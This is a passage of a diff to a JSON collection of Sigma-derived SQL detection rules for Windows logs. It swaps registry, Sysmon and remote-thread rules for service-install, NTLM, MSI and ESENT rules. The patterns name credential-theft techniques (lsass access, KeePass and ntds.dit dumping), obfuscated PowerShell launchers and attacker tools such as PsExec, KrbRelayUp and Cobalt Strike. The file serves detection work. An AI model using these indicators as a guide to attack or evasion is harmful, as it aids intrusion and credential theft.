'%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" + "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" }, { - "title": "Potential NetWire RAT Activity - Registry", - "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", + "title": "Invoke-Obfuscation Via Use Rundll32 - System", + "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", "status": "experimental", - "description": "Detects registry keys related to NetWire RAT", - "author": "Christopher Peacock", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "registry_add_malware_netwire.yml" + "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" }, { - "title": "Potential Persistence Via Disk Cleanup Handler - Registry", - "id": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", - "status": "experimental", - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "StoneDrill Service Install", + "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "status": "test", + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.g0064", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate new entry added by windows" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\Active Setup Temp Folders' ESCAPE '\\' OR TargetObject LIKE '%\\\\BranchCache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Content Indexer Cleaner' ESCAPE '\\' OR TargetObject LIKE '%\\\\D3D Shader Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Delivery Optimization Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Device Driver Packages' ESCAPE '\\' OR TargetObject LIKE '%\\\\Diagnostic Data Viewer database files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Downloaded Program Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\DownloadsFolder' ESCAPE '\\' OR TargetObject LIKE '%\\\\Feedback Hub Archive log files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Internet Cache Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Language Pack' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft Office Temp Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Offline Pages Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Old ChkDsk Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Previous Installations' ESCAPE '\\' OR TargetObject LIKE '%\\\\Recycle Bin' ESCAPE '\\' OR TargetObject LIKE '%\\\\RetailDemo Offline Content' ESCAPE '\\' OR TargetObject LIKE '%\\\\Setup Log Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error memory dump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error minidump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Setup Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Sync Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Thumbnail Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Update Cleanup' ESCAPE '\\' OR TargetObject LIKE '%\\\\Upgrade Discarded Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\User file versions' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Defender' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Error Reporting Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows ESD installation files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Upgrade Log Files' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" ], - "filename": "registry_add_persistence_disk_cleanup_handler_entry.yml" + "filename": "win_system_apt_stonedrill.yml" }, { - "title": "Potential Persistence Via New AMSI Providers - Registry", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", + "title": "KrbRelayUp Service Installation", + "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", "status": "experimental", - "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", + "author": "Sittikorn S, Tim Shelton", "tags": [ - "attack.persistence" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ - "Legitimate security products adding their own AMSI providers. Filter these according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" ], - "filename": "registry_add_persistence_amsi_providers.yml" + "filename": "win_system_krbrelayup_service_installation.yml" }, { - "title": "Potential Persistence Via Logon Scripts - Registry", - "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "title": "Turla Service Install", + "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", "status": "test", - "description": "Detects creation of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1037.001", "attack.persistence", - "attack.lateral_movement" + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" ], - "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" + "filename": "win_system_apt_carbonpaper_turla.yml" }, { - "title": "PUA - Sysinternals Tools Execution - Registry", - "id": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", + "title": "Remote Utilities Host Service Install", + "id": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", "status": "experimental", - "description": "Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.", + "description": "Detects Remote Utilities Host service installation on the target system.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.persistence" ], "falsepositives": [ - "Legitimate use of SysInternals tools. Filter the legitimate paths used in your environnement" + "Legitimate use of the tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sysinternals%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%\\\\rutserv.exe%' ESCAPE '\\' AND ImagePath LIKE '%-service%' ESCAPE '\\') OR ServiceName = 'Remote Utilities - Host'))" ], - "filename": "registry_add_pua_sysinternals_susp_execution_via_eula.yml" + "filename": "win_system_service_install_remote_utilities.yml" }, { - "title": "Potential Ursnif Malware Activity - Registry", - "id": "21f17060-b282-4249-ade0-589ea3591558", - "status": "test", - "description": "Detects registry keys related to Ursnif malware.", - "author": "megan201296", + "title": "Invoke-Obfuscation VAR+ Launcher - System", + "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1112" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "registry_add_malware_ursnif.yml" + "filename": "win_system_invoke_obfuscation_var_services.yml" }, { - "title": "Sysmon Configuration Change", - "id": "8ac03a65-6c84-4116-acad-dc1558ff7a77", - "status": "test", - "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", - "author": "frack113", + "title": "NetSupport Manager Service Install", + "id": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", + "status": "experimental", + "description": "Detects NetSupport Manager service installation on the target system.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence" ], "falsepositives": [ - "Legitimate administrative action" + "Legitimate use of the tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID = '16')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%\\\\NetSupport Manager\\\\client32.exe%' ESCAPE '\\' OR ServiceName = 'Client32'))" ], - "filename": "sysmon_config_modification.yml" + "filename": "win_system_service_install_netsupport_manager.yml" }, { - "title": "Sysmon Configuration Modification", - "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", + "title": "Potential RDP Exploit CVE-2019-0708", + "id": "aaa5b30d-f418-420b-83a0-299cb6024885", "status": "test", - "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", - "author": "frack113", + "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", + "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Legitimate administrative action" + "Bad connections or network interruptions" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('56', '50') AND Provider_Name = 'TermDD')" ], - "filename": "sysmon_config_modification_status.yml" + "filename": "win_system_rdp_potential_cve_2019_0708.yml" }, { - "title": "Sysmon Blocked Executable", - "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", + "id": "52a85084-6989-40c3-8f32-091e12e17692", "status": "experimental", - "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation. Viewed on 2008 Server", + "author": "Cybex", "tags": [ - "attack.defense_evasion" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE EventID = '27'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" ], - "filename": "sysmon_file_block_exe.yml" + "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" }, { - "title": "Sysmon Process Hollowing Detection", - "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", - "status": "experimental", - "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", + "title": "Potential Remote Desktop Connection to Non-Domain Host", + "id": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", + "status": "test", + "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", + "author": "James Pemberton", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.012" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "There are no known false positives at this time" + "Host connections to valid domains, exclude these.", + "Host connections not using host FQDN.", + "Host connections to external legitimate domains." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Type = 'Image is replaced' AND NOT ((NewProcessName LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8001' AND TargetName LIKE 'TERMSRV%' ESCAPE '\\')" ], - "filename": "sysmon_process_hollowing.yml" + "filename": "win_susp_ntlm_rdp.yml" }, { - "title": "Sysmon Configuration Error", - "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", - "status": "experimental", - "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", - "author": "frack113", + "title": "NTLM Brute Force", + "id": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", + "status": "test", + "description": "Detects common NTLM brute force device names", + "author": "Jerry Shockley '@jsh0x'", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.credential_access", + "attack.t1110" ], "falsepositives": [ - "Legitimate administrative action" + "Systems with names equal to the spoofed ones used by the brute force tools" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8004' AND WorkstationName IN ('Rdesktop', 'Remmina', 'Freerdp', 'Windows7', 'Windows8', 'Windows2012', 'Windows2016', 'Windows2019'))" ], - "filename": "sysmon_config_modification_error.yml" + "filename": "win_susp_ntlm_brute_force.yml" }, { - "title": "CobaltStrike Process Injection", - "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", - "status": "test", - "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", - "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", + "title": "Suspicious Digital Signature Of AppX Package", + "id": "b5aa7d60-c17e-4538-97de-09029d6cd76b", + "status": "experimental", + "description": "Detects execution of AppX packages with known suspicious or malicious signature", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055.001" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppxPackaging/Operational' AND EventID = '157' AND subjectName = 'CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization')" ], - "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" + "filename": "win_appxpackaging_om_sups_appx_signature.yml" }, { - "title": "CreateRemoteThread API and LoadLibrary", - "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", + "title": "Atera Agent Installation", + "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", "status": "test", - "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate Atera agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_loadlibrary.yml" + "filename": "win_software_atera_rmm_agent_install.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", - "id": "fb656378-f909-47c1-8747-278bf09f4f4f", + "title": "MSI Installation From Suspicious Locations", + "id": "c7c8aa1c-5aff-408e-828b-998e3620b341", "status": "experimental", - "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects MSI package installation from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND (Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\\\\\\\*' ESCAPE '\\')) AND NOT ((Data LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\') OR (Data LIKE '%C:\\\\Windows\\\\TEMP\\\\UpdHealthTools.msi%' ESCAPE '\\')))" ], - "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "win_msi_install_from_susp_locations.yml" }, { - "title": "Remote Thread Creation in Suspicious Targets", - "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "title": "MSI Installation From Web", + "id": "5594e67a-7f92-4a04-b65d-1a42fd824a60", "status": "experimental", - "description": "Detects a remote thread creation in suspicious target images", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects installation of a remote msi file from web.", + "author": "Stamatis Chatzimangou", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.003" + "attack.execution", + "attack.t1218", + "attack.t1218.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND Data LIKE '%://%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_targets.yml" + "filename": "win_msi_install_from_web.yml" }, { - "title": "KeePass Password Dumping", - "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", + "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", + "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", "status": "experimental", - "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", - "author": "Timon Hackenjos", + "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.005" + "attack.initial_access", + "attack.t1190" ], "falsepositives": [ - "Unknown" + "Other MSI packages for which your admins have used that name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_password_dumper_keepass.yml" + "filename": "win_vul_cve_2021_41379.yml" }, { - "title": "Bumblebee Remote Thread Creation", - "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "title": "Dump Ntds.dit To Suspicious Location", + "id": "94dc4390-6b7c-4784-8ffc-335334404650", "status": "experimental", - "description": "Detects remote thread injection events based on action seen used by bumblebee", + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate backup operation/creating shadow copies" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID = '325' AND Data LIKE '%ntds.dit%' ESCAPE '\\' AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Appdata\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\ntds.dit%' ESCAPE '\\'))" ], - "filename": "create_remote_thread_win_bumblebee.yml" + "filename": "win_esent_ntdsutil_abuse_susp_location.yml" }, { - "title": "Suspicious Remote Thread Target", - "id": "f016c716-754a-467f-a39e-63c06f773987", + "title": 